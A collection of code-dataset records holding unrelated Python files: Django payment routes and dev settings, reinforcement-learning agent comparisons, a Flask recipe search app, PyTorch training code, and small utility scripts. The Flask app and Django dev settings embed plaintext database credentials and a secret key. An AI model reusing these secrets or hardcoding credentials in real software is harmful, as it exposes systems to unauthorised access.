views.updatetransaction, name='updatetransaction'),\n\tpath('updateremarks/', views.updateremarks, name='updateremarks'),\n\tpath('hostelAndMessTransactions/', views.hostelAndMessTransactions, name='hostelAndMessTransactions'),\n\tpath('editTransactionRegno/', views.editTransactionRegno, name='editTransactionRegno'),\n\tpath('getTransaction/', views.getTransaction, name='getTransaction'),\n\tpath('paymentStatus/', views.paymentStatus, name='paymentStatus'),\n\tpath('feeDefaulters/', views.feeDefaulters, name='feeDefaulters'),\n\tpath('incomeCertificate/', views.incomeCertificate, name='incomeCertificate'),\n\tpath('acceptIncomeCertificate//', views.acceptIncomeCertificate, name='acceptIncomeCertificate'),\n\tpath('rejectIncomeCertificate/', views.rejectIncomeCertificate, name='rejectIncomeCertificate'),\n\tpath('tuitionFee/', views.tuitionFee, name='tuitionFee'),\n\tpath('acceptTuitionFee//', views.acceptTuitionFee, name='acceptTuitionFee'),\n\tpath('exportPayments/', views.exportPayments, name='exportPayments'),\n\tpath('importPayments/', views.importPayments, name='importPayments'),\n\tpath('exportCertificates/', views.exportCertificates, name='exportCertificates'),\n\tpath('rejectTuitionFee/', views.rejectTuitionFee, name='rejectTuitionFee'),\n\tpath('downloadFiles/', views.downloadFiles, name='downloadFiles'),\n]\n","sub_path":"payments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"537777248","text":"import socket\n\nfrom .base import *\n\nDEBUG = True\n\nEXECUTING_AS_TEST = 'True'\n\nSESSION_COOKIE_SECURE = False\n\nPUBLIC_APPLICATION_URL = os.environ.get('PUBLIC_APPLICATION_URL', 'http://localhost:8000/childminder')\n\nPAYMENT_URL = os.environ.get('APP_PAYMENT_URL', 'http://localhost:8001/payment-gateway')\n\nADDRESSING_URL = os.environ.get('APP_ADDRESSING_URL', 'http://localhost:8002/addressing-service')\n\nNOTIFY_URL = os.environ.get('APP_NOTIFY_URL', 'http://localhost:8003/notify-gateway')\n\n# Base URL of integration adapter for interfacing with NOO\nINTEGRATION_ADAPTER_URL = os.environ.get('APP_INTEGRATION_ADAPTER', 'http://localhost:8004/integration-adapter')\n\nINTERNAL_IPS = [\"127.0.0.1\", \"localhost\"]\n\nINTERNAL_IPS += [socket.gethostbyname(socket.gethostname())[:-1] + '1']\n\nALLOWED_HOSTS = ['*']\n\nTEST_NOTIFY_CONNECTION = False\n\nDEV_APPS = [\n 'debug_toolbar',\n 'django_extensions'\n]\n\n# GTM Container ID\nGOOGLE_TAG_MANAGER_ID = \"GTM-TMKB37K\"\n\nMIDDLEWARE_DEV = [\n 'debug_toolbar.middleware.DebugToolbarMiddleware'\n]\n\nEMAIL_EXPIRY = 1\n\n# Database\n# https://docs.djangoproject.com/en/1.11/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': os.environ.get('POSTGRES_DB', 'ofs'),\n 'USER': os.environ.get('POSTGRES_USER', 'ofs'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD', 'ofs'),\n 'HOST': os.environ.get('POSTGRES_HOST', 'localhost'),\n 'PORT': os.environ.get('POSTGRES_PORT', '5432')\n }\n}\n\nMIDDLEWARE = MIDDLEWARE + MIDDLEWARE_DEV\nINSTALLED_APPS = BUILTIN_APPS + THIRD_PARTY_APPS + DEV_APPS + PROJECT_APPS\n\nSECRET_KEY = '-asdasdsad322432maq#j23432*&(*&DASl6#mhak%8rbh$px8e&9c6b9@c7df=m'\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'console': {\n # exact format is not important, this is the minimum information\n 'format': '%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n },\n },\n 'handlers': {\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.TimedRotatingFileHandler',\n 'filename': 'logs/output.log',\n 'formatter': 'console',\n 'when': 'midnight',\n 'backupCount': 10\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler'\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['console'],\n 'level': 'DEBUG',\n 'propagate': True,\n },\n 'django.server': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}\n\n# AWS SQS keys\nAWS_SQS_ACCESS_KEY_ID = os.environ.get('AWS_SQS_ACCESS_KEY_ID')\nAWS_SQS_SECRET_ACCESS_KEY = os.environ.get('AWS_SQS_SECRET_ACCESS_KEY')\n\nSQS_QUEUE_PREFIX = os.environ.get('SQS_QUEUE_PREFIX', 'DEV')\nPAYMENT_NOTIFICATIONS_QUEUE_NAME = SQS_QUEUE_PREFIX + '_PAYMENT_NOTIFICATIONS'\n\n# The prefix added before a URN for finance system reconciliation purposes\nPAYMENT_URN_PREFIX = 'EY'\n\n# The prefix used to distinguish Worldpay payment entries for MORE\nPAYMENT_REFERENCE_PREFIX = 'MO'\n","sub_path":"childminder/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"316393796","text":"from q_table_agent import greedy_policy, discretize\nfrom reinforce_agent import logistic_regression\nfrom saes_agent import NeuralNetworkPolicy\nfrom envs.deep_cure_env import DeepCure, ForeignCountry, random_base_infect_rate, random_lifetime, random_delay\nfrom plotting import plot\nfrom stable_baselines3 import DQN\nfrom prettytable import PrettyTable\n\nimport numpy as np\n\ndef constant_action(env, action,rate, lifetime, delay):\n state = env.reset(rate, lifetime, delay)\n end = False\n while not end:\n state, reward, end, _ = env.step(action)\n return env\n\ndef reinforce(env, theta, rate, lifetime, delay):\n obs = env.reset(rate,lifetime,delay)\n done = False\n while not done:\n probs = logistic_regression(obs, theta)\n actions = probs >= 0.5\n obs, reward, done, _ = env.step(actions)\n return env\n\ndef q_table(env, table, stepsize, num_states, rate, lifetime, delay):\n state = discretize(env.reset(rate,lifetime,delay), stepsize, num_states)\n end = False\n t = 0\n while not end :\n action = greedy_policy(state, table)\n state, reward, end, _ = env.step(action)\n state = discretize(state, stepsize, num_states)\n return env\n\ndef saes(env, policy, theta, rate, lifetime, delay):\n obs = env.reset(rate,lifetime,delay)\n done = False\n while not done:\n probs = policy(obs, theta)\n actions = probs >= 0.5\n obs, reward, done, _ = env.step(actions)\n return env\n\ndef stable(env, model, rate, lifetime, delay):\n obs = env.reset(rate, lifetime, delay)\n done = False\n while not done:\n action, _states = model.predict(obs, deterministic=True)\n obs, reward, done, info = env.step(action)\n return env\n\ndef save_metrics(env, metric_dict, n):\n reward = sum(env.hist_reward)\n actions = np.array(env.hist_action)\n actions = np.sum(actions, axis=0)/len(env.hist_action)\n actions[2] = 1-actions[2]\n actions /= n\n dead_ratio = env.hist_dead[-1]/env.population\n infected_ratio = env.hist_infected[-1]/env.population\n metric_dict['reward'].append(reward)\n metric_dict['actions'] += actions\n metric_dict['dead'].append(dead_ratio)\n metric_dict['infected'].append(infected_ratio)\n return reward\n\ndef compare(agents, n = 250):\n results = [{'reward': [], 'actions': np.zeros(3), 'dead': [], 'infected': [], 'best': 0} for i in range(len(agents))]\n current_reward = np.zeros(len(agents))\n for _ in range(n):\n rate = random_base_infect_rate()\n lifetime = random_lifetime()\n delay = [random_delay()]\n for i,(name,agent) in enumerate(agents):\n # run agent\n env = agent(rate, lifetime, delay)\n current_reward[i] = save_metrics(env, results[i], n)\n # get best reward\n results[np.argmax(current_reward)]['best'] += 1./n\n\n # print statistic\n table = PrettyTable()\n table.field_names = ['Agent', 'Best', 'Mean Reward', 'Std Reward', 'Mean Dead', 'Std Dead', 'Mean Infected', 'Std Infected', 'Actions']\n for i,(name,agent) in enumerate(agents):\n result = results[i]\n reward = np.array(result['reward'])\n dead = np.array(result['dead'])\n infected = np.array(result['infected'])\n masks, curfew, borders = result['actions']\n table.add_row([name, result['best'], np.mean(reward), np.std(reward), np.mean(dead), np.std(dead), np.mean(infected), np.std(infected), f'{masks} / {curfew} / {borders}'])\n\n print(table)\n\n\nSEED = 22\nnp.random.seed(SEED)\nenv = DeepCure(foreign_countries = [ForeignCountry(0.1,100,100_000, save_history=True)], save_history=True, seed=SEED)\nenv.reset()\n\n# this environment is for DQN which uses discrete action space\nenv2 = DeepCure(foreign_countries = [ForeignCountry(0.1,100,100_000, save_history=True)], use_discrete = True, save_history=True, seed=SEED)\nenv2.reset()\n\n\ntheta = np.load('theta.npy')\n\nq_table100 = np.load('qtable-100.npy')\nq_table1000 = np.load('qtable-1000.npy')\n\ntheta_saes = np.load('saes-theta.npy')\npolicy = NeuralNetworkPolicy(env, one_layer=True)\n\ntheta_saes2 = np.load('saes-theta2.npy')\npolicy2 = NeuralNetworkPolicy(env, h_size=10, one_layer=False)\n\nmodel = DQN.load(\"best_model\")\n\nagents = [\n ('Action nothing', lambda r,l,d: constant_action(env, [False,False,True], r, l, d)),\n ('Action nothing (closed borders)', lambda r,l,d: constant_action(env,[False,False,False], r, l, d)),\n ('Action masks', lambda r,l,d: constant_action(env, [True,False,True], r, l, d)),\n ('Action masks (closed borders)', lambda r,l,d: constant_action(env, [True,False,False], r, l, d)),\n ('Action curfew', lambda r,l,d: constant_action(env, [False,True,True], r, l, d)),\n ('Action curfew (closed borders)', lambda r,l,d: constant_action(env, [False,True,False], r, l, d)),\n ('Action both', lambda r,l,d: constant_action(env, [True,True,True], r, l, d)),\n ('Action both (closed borders)', lambda r,l,d: constant_action(env, [True,True,False], r, l, d)),\n ('reinforce', lambda r,l,d: reinforce(env, theta, r, l, d)),\n ('qtable 100', lambda r,l,d: q_table(env, q_table100, 100, np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), r, l, d)),\n ('qtable 1000', lambda r,l,d: q_table(env, q_table1000, 1000, np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), r, l, d)),\n ('SAES 1', lambda r,l,d: saes(env, policy, theta_saes, r, l, d)),\n ('SAES 2', lambda r,l,d: saes(env, policy2, theta_saes2, r, l, d)),\n ('DQN', lambda r,l,d: stable(env2, model, r, l, d))\n]\n\n\n# runs 250 environments and tests each agent\ncompare(agents)\n\n# runs q_table agent\n# q_table(env, q_table100, 100, np.minimum((env.observation_space.high - env.observation_space.low)/10, 10).astype(int), 1.7, 100, [40])\n\n# runs saes agent\n# saes(env, policy, theta_saes, 1.7, 100, [40])\n\n# runs deep_q agent\n# deep_q(env, theta, 1.7, 100, [40])\n\n# runs a baseline agent\n# constant_action(env, [True, True, False], 1.7, 100, [40])\n\n# uncomment to plot the latest run\n# print(f'Reward {sum(env.hist_reward)}')\n# plot(env)\n","sub_path":"deep_cure_learning/comparison.py","file_name":"comparison.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"475369417","text":"from __future__ import print_function\nfrom flask import Flask, render_template, request, jsonify\nfrom sqlalchemy import create_engine\n#from car_data import get_cars_by # Week 12 Day 1 Sample Demo code\nimport json\nimport sys\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\nrecipe_data = \"mysql+mysqlconnector://{username}:{password}@{hostname}/{databasename}\".format(\n username=\"code2college\",\n password=\"iamnotspam\",\n hostname=\"code2college.mysql.pythonanywhere-services.com\",\n databasename=\"code2college$MyData\")\n\nengine = create_engine(recipe_data)\n\n### START Week12 Day 1 demo code ###\n# @app.route('/', methods=[\"GET\"])\n# def index():\n# return render_template(\"week12day1examplecode.html\")\n\n# @app.route('/carsearch', methods=[\"GET\"])\n# def car_search():\n# #print \"Entering method car_search\"\n\n# year = request.args[\"year\"] if request.args.has_key(\"year\") else None\n# make = request.args[\"make\"] if request.args.has_key(\"make\") else None\n# model = request.args[\"model\"] if request.args.has_key(\"model\") else None\n\n# #print \"year: \" + year + \" make: \" + make + \" model: \" + model\n\n# result = {\"message\": \"No results\"}\n\n# result[\"rows\"] = get_cars_by(year, make, model)\n\n\n# if result[\"rows\"]:\n# result[\"message\"] = str(len(result[\"rows\"])) + \" results\"\n\n# return jsonify(result)\n\n### END Week12 Day 1 demo code ###\n\n\n@app.route('/', methods=[\"GET\"])\ndef index():\n return render_template(\"main_page.html\")\n\n@app.route('/recipes', methods=[\"GET\"])\ndef get_recipes():\n name = request.args.get(\"name\")\n category = request.args.get(\"category\")\n url= request.args.get(\"url\")\n # below is how we can print to our error log, will probably remove this once debugging is complete\n print(\"request recieved: name:{0} category: {1} url: {2}\".format(name, category, url), file=sys.stderr)\n sql_query_string, params = create_query(name, category, url)\n # below is a good debug line, but will probably remove once debugging is complete\n print(\"sql_query_string: {0} params: {1}\".format(sql_query_string, params), file=sys.stderr)\n # definition for this execute method signature here https://dev.mysql.com/doc/connector-python/en/connector-python-api-mysqlcursor-execute.html\n results = engine.execute(sql_query_string, params)\n return json.dumps([(dict(row.items())) for row in results])\n\ndef create_query(name, category, url):\n need_or_operator = False\n query_string = \"SELECT recipe_name, recipe_link, category FROM RecipeData\"\n params = ()\n # we will set convention to always add a space at the BEGINNING of the sql chunk we're adding\n if name != \"\":\n query_string += \" WHERE recipe_name LIKE %s\"\n need_or_operator = True\n params += (\"%\"+name+\"%\",)\n if category != \"\":\n if need_or_operator:\n query_string += \" OR category = %s\"\n else:\n query_string += \" WHERE category = %s\"\n need_or_operator = True\n params += (category,)\n if url != \"\":\n if need_or_operator:\n query_string += \" OR recipe_link LIKE %s\"\n else:\n query_string += \" WHERE recipe_link LIKE %s\"\n params += (\"%\"+url+\"%\",)\n # we're adding this limit to cover the scenario the user didn't supply any\n # paramters. We don't want to return ALL the rows in our DB!\n query_string += \" limit 5\"\n\n return query_string, params\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"94625254","text":"import numpy as np\r\nfrom scipy.stats import norm\r\nimport time\r\nimport math\r\n\r\n# ' Likelihood for general Random Utility Models\r\n# '\r\n# ' @param Data ranking data\r\n# ' @param parameter Mean of Exponential Distribution\r\n# ' @param range range\r\n# ' @param res res\r\n# ' @param race TRUE if data is sub partial, FALSE (default) if not\r\n# ' @return log likelihood\r\n# ' @export\r\n# ' @examples\r\n# ' data(Data.Test)\r\n# ' parameter = Generate.RUM.Parameters(5, \"normal\")\r\n# ' Likelihood.RUM(Data.Test,parameter, \"norm\")\r\n'''\r\n Title: likelihoodRUM\r\n Authors: Tristan Villamil\r\n Lirong Xia\r\n Zhibing Zhao\r\n\r\n Description: The algorithm\r\n\r\n Input:\r\n Data - the ranking\r\n numpy array of rankings, see generate.py GenerateRUMData for data generation.\r\n parameter - mean of exponental distribution\r\n numpy array of means, see generate.py GenerateRUMParameters for generation\r\n range_var - range\r\n float\r\n res - res\r\n float\r\n\r\n Output:\r\n likelihood that Data belongs to parameter\r\n float\r\n'''\r\ndef likelihoodRUM(Data, parameter, range_var = None, res = None):\r\n t0 = time.time()\r\n if range_var == None:\r\n range_var = parameter[\"Mean\"].max() + 3 * parameter[\"SD\"].max()\r\n if res == None:\r\n res = range_var / 10000\r\n\r\n rank = Data\r\n S = range_var / res\r\n x = []\r\n for i in range(-int(S), int(S) + 1):\r\n x.append(i * res)\r\n\r\n n = rank.shape[0]\r\n m = 4\r\n\r\n ll = 0\r\n CDF = np.ones((1,len(x)), int)\r\n for j in range(m - 1, -1,-1):\r\n PDF = norm.pdf(x, loc=parameter[\"Mean\"][rank[j] - 1],scale=parameter[\"SD\"][rank[j] - 1])*CDF\r\n CDF = res * PDF.cumsum()\r\n ll = CDF[len(x) - 1]\r\n tf = time.time()\r\n #print(\"likelihood time:\", tf - t0)\r\n return ll","sub_path":"likelihood_rum.py","file_name":"likelihood_rum.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"553406812","text":"\"\"\"platforms\n\nRevision ID: 2910519f8cbe\nRevises: bff19a58f1f\nCreate Date: 2015-12-08 17:33:20.319225\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2910519f8cbe'\ndown_revision = 'bff19a58f1f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n op.create_table(\n 'platforms',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=100), nullable=False),\n sa.Column('node', sa.String(length=100), nullable=False),\n sa.PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('platforms')\n","sub_path":"migrations/alembic/versions/2910519f8cbe_platforms.py","file_name":"2910519f8cbe_platforms.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"78721324","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n#Constantes\nR1 = 10.0\nR2 = 10.0\nL1 = 15.0 * 10**(-3)\nL2 = 15.0 * 10**(-3)\nC1 = 50.0 * 10**(-6)\nC2 = 50.0 * 10**(-6)\nI1 = 12.0\n\n#Parte real de Phi (a)\ndef a(w):\n a1 = R1\n a2 = -1.0*R1*L2*C1*(w**2)\n a3 = R2*L1*L2*C1*C2*(w**4)\n a4 = -1.0*R2*L1*C2*(w**2)\n a5 = -1.0*R2*L1*C1*(w**2)\n a6 = -1.0*R2*L2*C2*(w**2)\n a7 = R2\n ans = a1 + a2 + a3 + a4 + a5 + a6 + a7\n return ans\n\n#Parte imaginaria de Phi (b)\ndef b(w):\n b1 = -1.0*R1*R2*L2*C1*C2*(w**2)\n b2 = R1*R2*C2*w\n b3 = R1*R2*C1*w\n b4 = w*L1\n b5 = -1.0*L1*L2*C1*(w**3)\n b6 = L2*w\n ans = b1 + b2 + b3 + b4 + b5 + b6\n return ans\n\n#Magnitud de Vr2\ndef mag(a,w,b):\n up = I1*R1*R2\n down = np.sqrt((a(w)**2) + (b(w)**2))\n ans = up/(down*1.0)\n return ans\n\n#Angulo de Vr2\ndef ang(a,w,b):\n e = b(w)/(a(w)*1.0)\n ans = -1.0*np.arctan(e)\n return ans\n\n#Generar punto de w\nww = np.linspace(0,6000,1000)\n\n#Puntos de w evaluados\nmm = mag(a,ww,b)\naa = ang(a,ww,b)\n\n#Grafica\nplt.plot(ww,mm)\nplt.title(\"Magnitud Vr2 vs. Frecuencia Angular\")\nplt.xlabel(\"Frecuencia angular (w) [rad/s]\")\nplt.ylabel(\"Magnitud [V]\")\nplt.savefig(\"Magnitud_Vr2.png\")\nplt.clf()\nplt.plot(ww,aa)\nplt.title(\"Fase Vr2 vs. Frecuencia Angular\")\nplt.xlabel(\"Frecuencia angular (w) [rad/s]\")\nplt.ylabel(\"Angulo de fase [rad]\")\nplt.savefig(\"Fase_Vr2.png\")\nplt.clf()\n","sub_path":"Tarea2_Vr2.py","file_name":"Tarea2_Vr2.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"272611681","text":"import torch, torchvision\nimport torch.nn as nn\nimport torch.utils as utils\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nimport datasets, cresnet, augmentations\nimport os, time, argparse, math\nimport torch.nn.functional as F\nfrom utils import AverageMeter, accuracy, sigmoid_rampup\nfrom torch.autograd import Variable\nfrom datasets import check_dataloader\n\nparser = argparse.ArgumentParser(description='Multi-task learning')\n\nparser.add_argument('--dataset',required=True,default=False) #cifar10,cifar100\nparser.add_argument('--arch', '-a',required=True, metavar='ARCH', default='resnetself') #metavar : description\nparser.add_argument('--auxiliary',default=False) #rotation color exemplar if joint, rotation_color\nparser.add_argument('--augmentation',type=int,default=False) # 4 or 2 in rotation, 3 6 2 in color permutation\n\n\nparser.add_argument('--epochs', default=80, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('-b', '--batch-size', default=128, type=int,\n metavar='N', help='mini-batch size (default: 128)')\nparser.add_argument('--lr', '--learning-rate', default=0.1, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--range-of-lr', nargs='+', type=int,help='1234 1234 1234',default=[40,60]) #--range-of-lr 1234 1234 1234 \nparser.add_argument('--ema-decay',type=float,default=0.999) \nparser.add_argument('--ema-class-loss',action='store_true') #auxiliary\nparser.add_argument('--val-freq', type=int, default=1000)\nparser.add_argument('--teacher', action='store_true')\n\nbest_prec1 = 0\nargs = parser.parse_args()\ndef main():\n \n global args,best_prec1\n \n log_directory = [args.dataset,args.arch,args.auxiliary,args.augmentation]\n while False in log_directory:\n log_directory.remove(False)\n for i in range(len(log_directory)):\n log_directory[i] = str(log_directory[i])\n log_directory = './logs/'+'/'.join(log_directory) + '/'\n \n \n\n start_time = time.strftime('%Y-%m-%d %I:%M:%S %p', time.localtime(time.time()))\n if not os.path.exists(log_directory):\n os.makedirs(log_directory)\n file = open(log_directory+start_time+'.txt','w')\n\n \n file.write('architecture: {0}\\n'\n 'total epochs: {1}\\n'\n 'batch size: {2}\\n'\n 'start learning rate: {3}\\n'\n 'range of learning rate: {4}\\n'\n 'dataset: {5}\\n'\n 'auxiliary type: {6}\\n'\n 'number of augmentation: {7}\\n'\n 'ema-auxiliary-loss: {8}\\n'\n 'teacher: {9}'\n .format(\n args.arch,\n args.epochs,\n args.batch_size,\n args.lr,\n args.range_of_lr,\n args.dataset,\n args.auxiliary,\n args.augmentation,\n args.ema_class_loss,\n args.teacher\n \n ))\n file.close()\n \n trainset,testloader, valloader = datasets.__dict__[args.dataset](batch=args.batch_size)\n\n trainloader = check_dataloader(trainset,args.val_freq,args.batch_size)\n\n \n\n \n if args.auxiliary =='rotation':\n auxiliary_classes = 4\n elif args.auxiliary =='color' and args.augmentation == 2:\n auxiliary_classes = 6\n elif args.auxiliary == 'color' and args.augmentation == 3:\n auxiliary_classes = 3\n elif args.auxiliary == 'color' and args.augmentation == 6:\n auxiliary_classes = 6\n\n \n\n\n\n if args.arch == 'resnetself':\n model = nn.DataParallel(cresnet.__dict__[args.arch](num_classes=int(args.dataset[5:]),num_auxiliary_classes=auxiliary_classes)).cuda()\n else:\n model = nn.DataParallel(cresnet.__dict__[args.arch](num_classes=int(args.dataset[5:]))).cuda()\n \n criterion = nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=0.9, weight_decay=0.0001)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer,milestones=args.range_of_lr, gamma=0.1, last_epoch=-1)\n \n for epoch in range(args.epochs):\n s = time.time()\n train(trainloader, model, criterion, optimizer,epoch,auxiliary=args.auxiliary,augmentation=args.augmentation,start_time=start_time,log_directory=log_directory)\n scheduler.step()\n \n\n \n # evaluate on validation set\n print(\"Evaluating the primary model:\")\n prec1 = validate(testloader, model, optimizer,criterion,auxiliary=args.auxiliary,start_time=start_time,log_directory=log_directory)\n \n \n \n # remember best prec@1 and save checkpoint\n is_best = prec1 > best_prec1\n best_prec1 = max(prec1, best_prec1)\n\n if epoch > 0 and epoch % 10 == 0:\n save_checkpoint({\n 'epoch': epoch + 1,\n 'state_dict':model.state_dict(),\n 'best_prec1': best_prec1,\n }, is_best, filename=os.path.join(log_directory, 'checkpoint.pth'))\n\n save_checkpoint({\n 'state_dict':model.state_dict(),\n 'best_prec1': best_prec1,\n }, is_best, filename=os.path.join(log_directory, 'model.pth'))\n\n\n\ndef train(trainloader, model, criterion, optimizer,epoch,auxiliary,augmentation,start_time,log_directory):\n \n\n\n losses = AverageMeter()\n acc = AverageMeter()\n acc_aux = AverageMeter()\n regression_loss = nn.MSELoss().cuda()\n # switch to train mode\n model.train()\n \n\n for i, (input, target) in enumerate(trainloader):\n\n # measure data loading time\n target = target.cuda()\n input_var = input.cuda()\n target_var = target\n batch_size =input_var.shape[0]\n if auxiliary == 'rotation':\n if augmentation == 2:\n input_var,target_aux = augmentations.__dict__['rotation'](input_var,target_var)\n elif augmentation == 4:\n input_var,target_aux = augmentations.__dict__['rotation_4'](input_var,target_var)\n else:\n assert False, 'choose augmentation'\n\n num_aug = input_var.shape[0] // batch_size\n optimizer.zero_grad() \n output, output_aux = model(input_var)\n output = output[::num_aug]\n soft = F.log_softmax(output_aux,dim=1)\n loss = criterion(output,target_var) + torch.mean(-torch.sum(target_aux*soft,dim=1))\n output, output_aux= output.float(), output_aux.float()\n prec1 = accuracy(output.data, target_var)[0]\n prec_aux = accuracy(output_aux.data,torch.argmax(target_aux,dim=1))[0]\n acc_aux.update(prec_aux.item(),input_var.size(0)) \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0))\n losses.update(loss.item(), input_var.size(0))\n \n\n\n elif auxiliary == 'color':\n if augmentation == 2:\n input_var,target_aux = augmentations.__dict__['color'](input_var,target_var)\n \n elif augmentation == 6:\n input_var,target_aux = augmentations.__dict__['color_6'](input_var,target_var) \n \n elif augmentation == 3:\n input_var,target_aux = augmentations.__dict__['color_3'](input_var,target_var) \n num_aug = input_var.shape[0] // batch_size\n optimizer.zero_grad() \n output, output_aux = model(input_var)\n output = output[::num_aug]\n soft = F.log_softmax(output_aux,dim=1)\n loss = criterion(output,target_var) + torch.mean(-torch.sum(target_aux*soft,dim=1))\n output, output_aux= output.float(), output_aux.float()\n prec1 = accuracy(output.data, target_var)[0]\n prec_aux = accuracy(output_aux.data,torch.argmax(target_aux,dim=1))[0]\n acc_aux.update(prec_aux.item(),input_var.size(0)) \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0))\n losses.update(loss.item(), input_var.size(0))\n elif auxiliary == False: \n\n output = model(input_var)\n loss = criterion(output, target_var)\n optimizer.zero_grad()\n output = output.float()\n prec1 = accuracy(output.data, target)[0] \n loss.backward()\n optimizer.step()\n loss = loss.float()\n acc.update(prec1.item(), input_var.size(0)) \n losses.update(loss.item(), input_var.size(0))\n \n # measure elapsed time\n tm = time.localtime(time.time())\n string = time.strftime('%Y-%m-%d %I:%M:%S %p', tm)\n file = open(log_directory+start_time+'.txt','a')\n if i % 50 == 0:\n print('{0} -'\n ' Epoch: [{1}][{2}/{3}] -'\n ' learning rate: {4:0.5e} -'\n ' Loss: {5:0.4f} -'\n ' main acc: {6:0.2f} %'\n ' auxiliary acc: {7:0.2f} %'.format(string,\n epoch, i, len(trainloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val,acc_aux.val))\n \n file.write('{0} -'\n ' Epoch: [{1}][{2}/{3}] -'\n ' learning rate: {4:0.5e} -'\n ' Loss: {5:0.4f} -'\n ' acc: {6:0.2f} %'\n ' auxiliary acc: {7:0.2f} %\\n'.format(string,\n epoch, i, len(trainloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val,acc_aux.val)) \n print('average training accuracy: {acc.avg:.3f}'\n .format(acc=acc)) \n file.write('average training accuracy: {acc.avg:.3f}\\n'\n .format(acc=acc))\n file.close()\n\ndef validate(testloader, model,optimizer,criterion,auxiliary,start_time,log_directory):\n \"\"\"\n Run evaluation\n \"\"\"\n losses = AverageMeter()\n acc = AverageMeter()\n acc_aux = AverageMeter()\n regression_loss = nn.MSELoss().cuda()\n # switch to evaluate mode\n model.eval()\n\n with torch.no_grad():\n for i, (input, target) in enumerate(testloader):\n target = target.cuda()\n input_var = input.cuda()\n target_var = target.cuda()\n\n \n if auxiliary == False: \n # compute output\n output = model(input_var)\n \n else:\n output, output_aux = model(input_var)\n \n loss = criterion(output,target_var)\n output = output.float()\n loss = loss.float()\n\n # measure accuracy and record loss\n prec1 = accuracy(output.data, target)[0]\n losses.update(loss.item(), input.size(0))\n acc.update(prec1.item(), input.size(0))\n \n\n # measure elapsed time\n tm = time.localtime(time.time())\n string = time.strftime('%Y-%m-%d %I:%M:%S %p', tm)\n file = open(log_directory+start_time+'.txt','a')\n if i % 50 == 0:\n print('{0} -'\n ' Epoch: [{1}/{2}] -'\n ' learning rate: {3:0.5e} -'\n ' Loss: {4:0.4f} -'\n ' acc: {5:0.2f} %'.format(string,\n i, len(testloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val))\n file.write('{0} -'\n ' Epoch: [{1}/{2}] -'\n ' learning rate: {3:0.5e} -'\n ' Loss: {4:0.4f} -'\n ' acc: {5:0.2f} %\\n'.format(string,\n i, len(testloader),optimizer.param_groups[0]['lr'],\n losses.val,acc.val)) \n print('average validation accuracy: {acc.avg:.3f}'\n .format(acc=acc))\n file.write('---------------------------------------------\\n'\n '| average validation accuracy |\\n'\n '| {acc.avg:.3f} |\\n'\n '---------------------------------------------\\n'\n .format(acc=acc)) \n file.close()\n return acc.avg\n\ndef save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):\n \"\"\"\n Save the training model\n \"\"\"\n torch.save(state, filename)\n\n\n\n\n\nif __name__ == '__main__': #이 파일을 직접실행했을때만 main() 함수를 실행시켜라\n main() \n","sub_path":"student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":12737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"570244079","text":"\"\"\"\nSettings for production. Be sure to keep all *secrets* in environment\nvariables. The following environment variables can be set:\n\n * ``DJANGO_SETTINGS_MODULE`` -- \"{{ project_name }}.settings.prod\"\n * ``DJANGO_SECRET_KEY`` -- Unique secret key for this project\n * ``DJANGO_DB_NAME`` -- Database name.\n * ``DJANGO_DB_USER`` -- Database username.\n * ``DJANGO_DB_PASSWORD`` -- Database password. Leave empty for no password.\n * ``DJANGO_DB_HOST`` -- Database host. Leave empty for localhost.\n * ``DJANGO_DB_PORT`` -- Database port. Leave empty for defaults.\n\n.. tip:: These can be set in Apache VirtualHost entries using the 